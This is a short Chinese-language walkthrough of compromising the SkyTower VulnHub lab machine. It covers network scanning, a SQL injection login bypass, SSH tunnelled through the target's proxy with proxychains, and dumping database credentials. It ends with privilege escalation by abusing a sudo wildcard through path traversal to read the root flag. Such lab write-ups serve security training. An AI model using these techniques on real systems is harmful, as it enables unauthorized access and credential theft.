一、安装配置靶机
下载地址:
SkyTower: 1 ~ VulnHub
下载之后解压发现是VirtualBox格式的
我们下载一个VirtualBox,这是官网
Downloads – Oracle VirtualBox
安装到默认路径就
打开后点击注册
选择解压后的vbox文件
然后点击左上角管理
点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步
就得到了一个镜像文件
用vmware打开
默认网卡模式为仅主机,更改为NAT模式
C段扫描获得IP
arp-scan -l
端口扫描一下发现22,80,3128
nmap 192.168.230.128
访问一下80端口
发现一个登录框
发现登录框,我们测sql注入
邮箱随便输入一个,密码我们输入
123' 1=1#
登录成功发现账号密码
想到远程连接22端口
发现无效
想到3128端口尝试挂上代理连接
vim /etc/proxychains4.conf
proxychains ssh john@192.168.230.128 -t "/bin/sh"
登录成功
开始提权
sudo -l
发现没有可以提权的
想到了80端口界面存在sql注入
cat /var/www/login.php
发现数据库信息
登录成功
mysql -u root SkyTech -p
查看数据库信息
show databases;
逐个查看找到
use SkyTech;
show tables;
得到账号密码
select * from login
ssh登录
proxychains ssh sara@192.168.230.128 -t "/bin/sh"
sudo -l
得到/accounts/*有权限
pwd
发现在根目录下
sudo ls /accounts/../root
查看一下
sudo cat /accounts/../root/flag.txt
得到root密码
远程连接提权成功
proxychains ssh root@192.168.230.128 -t "/bin/sh"